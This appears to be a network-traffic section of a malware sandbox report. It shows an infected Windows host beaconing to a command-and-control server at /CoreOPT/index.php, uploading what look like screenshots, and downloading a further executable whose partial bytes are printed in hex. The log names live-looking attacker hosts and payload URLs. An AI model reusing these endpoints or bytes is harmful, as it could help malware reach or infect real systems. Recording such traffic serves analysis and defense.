Aug 31, 2024 22:42:25.739767075 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 22:42:26.627585888 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 22:42:26.636542082 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Aug 31, 2024 22:42:27.001904011 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49787	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:27.109998941 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 22:42:27.980021000 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 22:42:28.034657955 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Aug 31, 2024 22:42:28.582655907 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Aug 31, 2024 22:42:28.617347956 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49788	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:27.297841072 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTAzMTk1 Host: 185.215.113.19 Content-Length: 103347 Cache-Control: no-cache
Aug 31, 2024 22:42:27.297841072 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 41 7a 4d 54 6b 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTAzMTk1Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:42:27.297914982 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:42:27.297914982 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:42:27.297951937 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:42:27.297951937 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:42:27.297962904 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:42:27.297962904 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:42:27.298012972 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:42:27.298012972 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:42:27.298070908 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 22:42:29.224741936 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49789	185.216.214.225	80	5900	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:28.613843918 CEST	121	OUT	GET /Jhiidutz.exe HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: 185.216.214.225 Cache-Control: no-cache
Aug 31, 2024 22:42:29.288229942 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:29 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 09 Aug 2024 00:59:07 GMT ETag: "a5000-61f35a680ff51" Accept-Ranges: bytes Content-Length: 675840 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 14 a3 90 8b 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 48 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 6e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd"0H @ `@@ n H.textG H `.rsrcnJ@@Hd[x8#GdP6>(=#U.RiDHx7z)V?2tsA]4rI0 Phsu;Pu7g`D.apnRa+5uxr!6}{A69/W8'eU\|x+Tq7+9Gt=JE[_MX!@96]At{"Vi%.-Ld$q-*xb^}3:c_Dk^~48AuRdclo< PX$HvN2?y6~Y"3W.CH';
Aug 31, 2024 22:42:29.288326025 CEST	224	IN	Data Raw: dd 20 46 2a 66 a6 16 aa ca fd f2 43 cd 90 48 12 ee 78 f1 91 4b c4 ca ec 1a ae 7e b4 a7 68 be b6 47 79 57 a0 dd bc 3f 09 e1 5e 05 b1 d5 9b ce 32 ae 2c bd f3 84 ae 3e 87 60 2a 72 48 4f c0 5e a4 70 da 00 64 a6 be 89 4c 7a 0e f0 fd cd f1 4b ff 98 12 Data Ascii: FfCHxK~hGyW?^2,>`rHO^pdLzKxNi6]b^eVW3(MWoVyH@"5nbme/L#w<\7O+\|)JI%:p5r`#"X1zg'P+@,jf(sc%DAB^ZT#
Aug 31, 2024 22:42:29.288330078 CEST	1236	IN	Data Raw: 54 07 85 61 d7 75 24 2c c0 32 c8 de 64 f1 d9 1d 62 e6 51 cd bf 82 d6 60 0f 3b 34 44 b6 d7 1b fc d8 46 02 bd c8 78 30 24 63 77 2e a5 88 2a c3 44 b6 44 85 2d 89 b9 b4 eb cf ea 68 02 a6 57 ad db 14 29 36 91 6e 1a 3c fd 27 8a a2 f5 d0 0d f0 73 81 9e Data Ascii: Tau$,2dbQ`;4DFx0$cw.*DD-hW)6n<'s6HXa$?Aq.Z9} {MYLw[IMte:FRm>%KSSiD/ZqM>3FNha.}^,:^!-ww()b~
Aug 31, 2024 22:42:29.288393021 CEST	1236	IN	Data Raw: 4e 06 47 27 07 b3 2e ab f9 6f 13 ee 7e bd 22 99 21 55 e2 52 ee 67 41 9e 9d 4c fd b3 a9 ad 96 93 18 0f e9 e9 99 f3 0f 64 2f e3 8a 73 67 81 65 26 df 2b b2 d3 02 f5 47 bb f3 f5 77 a8 74 3a d4 d5 bb d4 3d cd d5 ce 9a 8e 50 56 3c ee 2b 09 c5 a6 0e 76 Data Ascii: NG'.o~"!URgALd/sge&+Gwt:=PV<+vZi8qZBdKZ^uWLUH!Pe+No7^&~t8~2aF84N@F7>Yo6Du}'9O+X-=#\&
Aug 31, 2024 22:42:29.288398981 CEST	1236	IN	Data Raw: a7 f2 81 40 6a e4 d6 5f da 5e 68 1d 80 51 fd 11 84 3c 94 f0 a5 72 ee c2 bc 62 92 0b d0 ca ec 96 d6 38 47 6b eb 02 0c a8 01 a2 be be dc ac c2 fb 4d 60 2c 91 ad e9 e1 30 e9 d0 32 4a a7 b5 e3 e9 33 2d 6d 7f b6 f2 f8 6b 8c c8 74 58 c8 be 8d f0 a3 f2 Data Ascii: @j_^hQ<rb8GkM`,02J3-mktXzN6#KDT".Wqtiy:497[j#dhWeH;V-^4)2W:}2M[;zfOOPos_I86BVK;(s%&uE
Aug 31, 2024 22:42:29.288404942 CEST	1236	IN	Data Raw: 57 d0 99 1f 01 f9 df 2c 3b 7a 96 cc 61 d9 ba 72 6b e5 de ef 78 04 bd e5 19 75 c2 72 70 42 cf d7 c7 68 8c de f9 31 3b 86 33 ba bc 49 bd f6 b4 45 f7 6b d7 76 bf 44 f4 c1 cc e9 10 97 da db cd 53 28 eb 4e 44 ba bb 57 5c c8 69 f1 cb 4f 4d cb 33 fc bc Data Ascii: W,;zarkxurpBh1;3IEkvDS(NDW\iOM3?:j"V)`g),{7~H*bCTAse]0,)N]vQyF.2ViGqn+`%ZI1A(rHRDdM@N\|px2'%NP6b
Aug 31, 2024 22:42:29.288456917 CEST	896	IN	Data Raw: b3 f9 09 2a 89 7f 44 65 ce a0 20 7b 36 95 3f 46 23 57 9e 90 39 88 80 dd 4d 68 1e 7a 7c 1f 70 1c 7c bb 18 8e a2 f3 1c 6e b0 ad fb 77 bf c5 ea 02 86 ba 06 32 6b ef 26 67 a5 78 a9 c2 30 12 ed 0d 22 d9 cb bb 71 15 4e 3b b3 40 ce ea 61 92 0a 88 b7 ce Data Ascii: *De {6?F#W9Mhz\|p\|nw2k&gx0"qN;@a4HU/FJi;xvYN`H#_1)ADdGqQ(Bjd{SGorq%mNTcB<l'+-)k[hb4G~~l>,
Aug 31, 2024 22:42:29.288463116 CEST	1236	IN	Data Raw: 19 da f8 98 b9 b6 de b2 f5 7c ec a4 ce ed 67 df a0 84 18 a9 4e 70 40 5a 04 12 b1 f0 1d 9a 6d 3d 26 2d 18 99 eb d8 5a 1c 99 c5 5a e7 61 52 3e d7 ba f6 e5 56 80 4e f4 db 07 01 cc a7 08 e3 a7 8e 72 ad 73 f6 c9 0b e7 dc df fa 6c 4e 93 3b f1 2f 57 05 Data Ascii: \|gNp@Zm=&-ZZaR>VNrslN;/Wf5?O67\*uV}ew>W(M/`J6`?.A[mxo<$Zucn[B$^[]nAhC7wpjk#7sn&-!xAc^\-)fLb8t9g
Aug 31, 2024 22:42:29.288467884 CEST	1236	IN	Data Raw: 9d 59 98 d3 ca 26 05 19 75 22 2c 59 45 a6 15 eb 43 7c 37 ae a9 35 7b 2a 83 24 4f 39 e3 b9 8f c0 13 96 a2 7c 90 6f 0f e8 4c cf ab 6e 3c 0c b1 14 b2 7e b4 f6 fe 0a a9 5a 49 8e 7a f3 d6 09 5d 2e 2c ab 8f 26 c5 89 ed aa f8 f7 15 41 dd 6a f9 db 1f 7d Data Ascii: Y&u",YEC\|75{*$O9\|oLn<~ZIz].,&Aj}5R{<:N)I)d6>YRCD@imwL%1//H"d^{h6~~WEe)5'Zh%f"aPgLp)ECFNpz)DXz DfCz
Aug 31, 2024 22:42:29.288474083 CEST	1236	IN	Data Raw: f2 65 a2 dc e4 9b 13 c4 a3 e7 e4 a8 de dc eb 99 69 22 a9 89 a3 c5 dc fb cb 00 14 95 d0 5a cd eb ce a8 c6 d7 35 96 93 7b 4f 59 ba dd f1 b5 4b 50 66 b5 64 18 a4 65 e1 dd 39 65 91 69 6f 38 a1 82 c8 bb 03 1b 7c 3c 4d 3b 86 1c bc 7a 00 82 97 6e 1c e4 Data Ascii: ei"Z5{OYKPfde9eio8\|<M;zn\|&<W2uRlY~d^3ETo"[LV7>v#Z5}+n;?^8&Ko+?HmC;'kJ%QwBH^99UdVRakufw
Aug 31, 2024 22:42:29.293328047 CEST	1236	IN	Data Raw: 0b bd 52 d2 7c 8b c7 c5 47 06 32 89 4c ae 4e bc cf 42 a1 b5 2a 7b 5d d3 54 63 d1 4e 8f 94 6a 36 58 17 b9 b1 a7 0a d8 b1 1e 0c 7a 16 c8 84 8d 36 82 68 e4 62 4d 12 2e 3a df 7a a5 bf da a3 32 31 d9 38 e9 f5 77 10 12 b2 c7 2c 5c c4 62 5e 2f 9d be 3d Data Ascii: R\|G2LNB*{]TcNj6Xz6hbM.:z218w,\b^/=lHJPF3@IKhWc]$mfWEd.'g +aXxx4JRgD(juW&Y"[{?bqiAwzt\yf"'=E)~]J2MN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49791	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:28.714651108 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 22:42:32.596641064 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 22:42:32.598679066 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49794	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:29.482774973 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTAxMjY0 Host: 185.215.113.19 Content-Length: 101416 Cache-Control: no-cache
Aug 31, 2024 22:42:29.482943058 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 41 78 4d 6a 59 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTAxMjY0Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:42:29.482943058 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:42:29.482943058 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:42:29.482943058 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:42:29.482943058 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:42:29.483021021 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:42:29.483021021 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:42:29.483021021 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:42:29.483062983 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:42:29.483174086 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 22:42:31.065912008 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49795	185.216.214.225	80	5900	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:30.902631044 CEST	121	OUT	GET /Jhiidutz.exe HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: 185.216.214.225 Cache-Control: no-cache
Aug 31, 2024 22:42:31.610965014 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:31 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 09 Aug 2024 00:59:07 GMT ETag: "a5000-61f35a680ff51" Accept-Ranges: bytes Content-Length: 675840 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 14 a3 90 8b 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 48 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 6e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd"0H @ `@@ n H.textG H `.rsrcnJ@@Hd[x8#GdP6>(=#U.RiDHx7z)V?2tsA]4rI0 Phsu;Pu7g`D.apnRa+5uxr!6}{A69/W8'eU\|x+Tq7+9Gt=JE[_MX!@96]At{"Vi%.-Ld$q-*xb^}3:c_Dk^~48AuRdclo< PX$HvN2?y6~Y"3W.CH';
Aug 31, 2024 22:42:31.611114979 CEST	1236	IN	Data Raw: dd 20 46 2a 66 a6 16 aa ca fd f2 43 cd 90 48 12 ee 78 f1 91 4b c4 ca ec 1a ae 7e b4 a7 68 be b6 47 79 57 a0 dd bc 3f 09 e1 5e 05 b1 d5 9b ce 32 ae 2c bd f3 84 ae 3e 87 60 2a 72 48 4f c0 5e a4 70 da 00 64 a6 be 89 4c 7a 0e f0 fd cd f1 4b ff 98 12 Data Ascii: FfCHxK~hGyW?^2,>`rHO^pdLzKxNi6]b^eVW3(MWoVyH@"5nbme/L#w<\7O+\|)JI%:p5r`#"X1zg'P+@,jf(sc%DAB^ZT#Tau$,2dbQ
Aug 31, 2024 22:42:31.611126900 CEST	448	IN	Data Raw: d3 a8 e4 58 2a 98 1e 63 71 4b 6f 72 d3 9b d0 e5 f7 91 c8 d8 81 8e ed c9 da 12 58 56 62 9c ba 5e af 71 87 6f 0a f8 1b 2c e0 3e cb 43 f6 5f 3c 22 7a e9 e1 26 17 6c a8 64 fd 88 94 84 86 79 fa 74 36 df 08 ea d6 dd 35 20 f9 83 0f 0d 31 cb 96 e9 a1 4e Data Ascii: X*cqKorXVb^qo,>C_<"z&ldyt65 1N,A[C~)A\-utu(Li7#-Sp+,"\}E7$BkCfUvk'<8t$4h}3Djrel`5NG'.o~"!U
Aug 31, 2024 22:42:31.611584902 CEST	1236	IN	Data Raw: e7 58 2d 11 c4 c8 9d e4 be d0 3d b8 23 a4 8d db 5c 91 26 b7 e3 a0 c2 10 9b 3c c3 d2 6d 50 bd 14 04 63 5c 70 da 87 2b 17 b3 7e bc ad 5e 1c 17 b6 3b 75 73 2c 36 a1 4d cb 73 96 0f 94 fb 9e 87 34 d6 f5 2e c4 c9 7c b2 1f 2c 9a b0 99 3f 5f 0c d4 7a d9 Data Ascii: X-=#\&<mPc\p+~^;us,6Ms4.\|,?_zynQnMXB<a@*XI]cjP[QJL6dH._'bnf)VUCifb@!S!MKIT~J+:~).8-7\
Aug 31, 2024 22:42:31.611597061 CEST	1236	IN	Data Raw: fd 3b af 28 92 73 f3 84 bf 25 cf 26 90 15 75 e7 8e b8 45 97 4e 8a f9 df fd d3 e2 d2 b2 61 b6 65 86 32 d0 50 69 0c 9f f3 24 3d 27 f8 f7 59 ea b0 9c 99 d0 c1 d0 d3 2f dd 82 57 d5 a6 b6 bf a3 00 80 65 f3 64 5b f7 6e 97 9d c9 66 8e cb 72 1b b7 8c cc Data Ascii: ;(s%&uENae2Pi$='Y/Wed[nfrM;hDP2[IR\|64t25Qb;3v!_{{Nrf=n[*Kj0\|L?'k$x.x\^e2fql_R`c ?Xn(
Aug 31, 2024 22:42:31.611884117 CEST	1236	IN	Data Raw: 00 c7 02 b2 4e 88 19 0c f7 97 50 f2 f0 12 b4 36 98 62 83 40 71 a5 6e c4 fc fb 3d 74 b3 af da 16 e3 ff d2 1b a0 f1 7a c0 b5 d9 0c 97 c5 42 93 4f ab 3c ee 27 9d 72 aa 3e ab a3 6c ff 1a 0f 80 f7 64 8e 97 21 8a 3b d4 d4 e5 75 9d c3 68 56 d9 1c 6d c5 Data Ascii: NP6b@qn=tzBO<'r>ld!;uhVmrT+d?WGFPH^'h%;Tdjq?k7LBuw&Pt!L0s\|.F4VyW2)Wo)QYOIjPQm\|F1yXxQUX
Aug 31, 2024 22:42:31.612133980 CEST	1236	IN	Data Raw: 18 ed 9a 7e da d2 6c 95 c1 eb 3e e4 05 2c 98 c2 03 b9 87 b1 7e fd 74 50 ed 90 13 1a a2 60 f7 d6 8b ca 63 36 f1 43 be b0 81 02 ee bf 34 d2 0b 4a 1c 59 9d ef 3f e2 b2 47 49 24 69 49 3c 3d 68 0a fd e3 5d 16 ae 50 cb 58 5f e0 18 32 55 e6 29 0e f1 2e Data Ascii: ~l>,~tP`c6C4JY?GI$iI<=h]PX_2U).YdA7'e$-yVhJMGF5[0!Hh[I[P{)$/*_l>L`!lYD_,p^`wI+<C8Ne}u-MP
Aug 31, 2024 22:42:31.612147093 CEST	896	IN	Data Raw: 8d 53 6a 66 c6 d1 12 4a 1e 6c a1 98 d8 6d 3a f7 00 9a 1b 1a 9f f9 07 38 5d 27 79 67 a1 38 65 7a 4f 45 f5 96 3d 38 0b 7a b1 f7 2e b0 97 96 a2 bc f9 7a 94 93 72 b1 50 3e 0c c3 59 4f 50 be 74 cf 69 67 8e 00 a7 ce e9 5f 32 14 cb 4c f9 c1 0c 37 e2 25 Data Ascii: SjfJlm:8]'yg8ezOE=8z.zrP>YOPtig_2L7%_[K l ]x%eDs'6f,'%(8Z+.tS#E8Gs]=#n&#*4F-bc!y,\yxS?&Vvhz^a$ZJOx
Aug 31, 2024 22:42:31.613053083 CEST	1236	IN	Data Raw: a8 b4 df 58 8e ac 7a a5 8d 10 b5 20 85 44 e7 66 ae 43 7a 43 8b 9a e3 46 94 4f cc 96 52 04 49 57 58 b8 7f a4 68 0e c9 50 1a d6 39 1f 3e fe 6e 57 4d e2 fe 70 af 96 2b 4d 31 58 83 f5 8c c7 e0 e6 8c 03 bd 9f 95 dc c8 a8 76 94 8f be 64 7c 4f 12 90 ab Data Ascii: Xz DfCzCFORIWXhP9>nWMp+M1Xvd\|OZ(}e8)i6Dam=J!"E:xQYt"<D}s.>M`z<?S6nMK+.ioq2Sx\|tA6d~STu&HwI@'O6$/RO@w
Aug 31, 2024 22:42:31.613692999 CEST	224	IN	Data Raw: c1 a9 55 64 02 e1 56 12 52 1d 61 6b 9f 75 66 0f f7 77 fe ae 4c 09 f9 9c 6a 1a e2 77 5f d5 b8 0f 57 75 84 96 d0 ab 75 e4 70 fd b4 6f b1 f2 16 6b ed ba be 8c 64 59 3d 30 bf 8f 28 a8 09 8c f8 ee 0b 3c d4 64 c3 dc 17 b1 b0 c8 b7 18 ae 2b 00 d0 9f 86 Data Ascii: UdVRakufwLjw_WuupokdY=0(<d+6_nh<}TKhY{-)*p_f4-(cU!^GD$9V:>Fk,8>if2u3`.
